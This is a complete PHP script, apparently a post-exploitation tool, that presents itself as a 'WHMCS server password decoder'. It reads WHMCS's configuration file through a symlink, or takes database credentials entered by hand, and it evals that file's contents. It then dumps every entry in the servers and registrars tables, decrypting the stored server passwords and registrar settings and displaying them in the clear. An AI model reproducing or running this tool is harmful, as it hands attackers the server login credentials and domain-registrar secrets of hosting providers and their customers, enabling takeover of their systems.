code:
<?php ########################################### # whmcs server password decoder # # # # [email protected] # #note : i'm proud to be ~~pakistan~~ # ########################################### function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash ($key); $hash_length = strlen ($hash_key); $string = base64_decode ($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 and $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; } function _hash ($string) { if (function_exists ('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } if($_post['form_action'] == 1 ) { //include($file); $file=($_post['file']); $text=file_get_contents($file); $text= str_replace("<?php", "", $text); $text= str_replace("<?", "", $text); $text= str_replace("?>", "", $text); eval($text); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("select * from tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>type</td><td>$type</td></tr>"); echo("<tr><td>active</td><td>$active</td></tr>"); echo("<tr><td>hostname</td><td>$hostname</td></tr>"); echo("<tr><td>ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>username</td><td>$username</td></tr>"); echo("<tr><td>password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("select * from tblregistrars"); echo("<center>domain reseller <br><table border='1'>"); echo("<tr><td>registrar</td><td>setting</td><td>value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } echo "</table><br><br></center>"; } if($_post['form_action'] == 2 ) { //include($file); $db_host=($_post['db_host']); $db_username=($_post['db_username']); $db_password=($_post['db_password']); $db_name=($_post['db_name']); $cc_encryption_hash=($_post['cc_encryption_hash']); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("select * from tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>type</td><td>$type</td></tr>"); echo("<tr><td>active</td><td>$active</td></tr>"); echo("<tr><td>hostname</td><td>$hostname</td></tr>"); echo("<tr><td>ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>username</td><td>$username</td></tr>"); echo("<tr><td>password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("select * from tblregistrars"); echo("<center>domain reseller <br><table border='1'>"); echo("<tr><td>registrar</td><td>setting</td><td>value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } echo "</table><br><br></center>"; } ?><body bgcolor="#000000"> <style> body { scrollbar-base-color: #191919; scrollbar-arrow-color: olive; color: white;} textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: tahoma; border: 1px solid #666666;} input{font-weight:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: tahoma; border: 1px solid #666666;height:17} </style> <center> <font color="#ffff6ff" size='+3'>[ ~~ whmcs server password decoder ~~ ]</font><br><br> <font color="#0066ff" size='+2'>symlink to configuration.php of whmcs</font><br> </center> <form action="" method="post"> <input type="hidden" name="form_action" value="1"> <br> <input type="text" size="30" name="file" value=""> <br> <input class=submit type="submit" value="submit" name="submit"> </form> <hr> <br> <center> <font color="#0066ff" size='+2'>db configuration of whmcs</font><br> </center> <form action="" method="post"> <input type="hidden" name="form_action" value="2"> <br> <table border=1> <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr> <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr> <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr> <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr> <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr> </table> <br> <input class=submit type="submit" value="submit" name="submit"> </form> <hr> <center> <font color="#0066ff" size='+2'>password decoder</font><br> <? if($_post['form_action'] == 3 ) { $password=($_post['password']); $cc_encryption_hash=($_post['cc_encryption_hash']); $password = decrypt ($password, $cc_encryption_hash); echo("password is ".$password); } ?> </center> <form action="" method="post"> <input type="hidden" name="form_action" value="3"> <br> <table border=1> <tr><td>password</td><td><input type="text" size="30" name="password" value=""></td></tr> <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr> </table> <br> <input class=submit type="submit" value="submit" name="submit"> </form> <hr> <center> <font color="#ffff6ff" size='+1'> [email protected] </font><br><br> <center>